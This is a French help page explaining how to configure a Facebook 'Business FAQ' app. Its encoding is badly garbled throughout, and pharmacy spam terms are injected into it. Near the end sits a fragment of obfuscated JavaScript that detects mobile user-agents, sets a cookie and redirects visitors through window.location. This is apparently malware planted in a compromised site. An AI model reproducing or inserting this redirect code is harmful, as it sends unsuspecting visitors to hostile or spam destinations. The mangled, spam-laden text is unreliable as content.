Configurez votre Foire Aux Questions.

• OA? trouver notre application ?

Vous pourrez trouver notre application Business FAQ en suivant ce lien:Ai??https://apps.facebook.com/business-faq

Acceptez de donner Ai?? Business FAQ l’accA?s Ai?? vos informations publiques (en savoir plus sur les permissions). Puis sAi??lectionnez la page Ai?? configurer.

b_faq_onglet

• RAi??diger les questions/rAi??ponses.

Cliquez, dans le Menu principal de gauche, cliquez sur « Templates de texte ».
Cela vous affichera la liste de vos templates lorsque vous les aurez crAi??Ai??s.
Pour crAi??er un nouveau template cliquez sur « Ajouter un nouveau text template ».

lady-era pills bfaq gerer

Un Ai??diteur de texte s’ouvre, renseignez dans le champAi?? »titre » la question Ai?? laquelle vous souhaitez rAi??pondre, et dans « texte » la rAi??ponse Ai?? cette mA?me question. Vous pouvez attribuer une langue, ce qui affichera la bonne traduction Ai?? vos clients.

crAi??ation

N’oubliez pas d’enregistrer.
Vous pouvez Ai??galement vous envoyer un aperAi??u par Email.
crAi??ation 01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} betnovate n.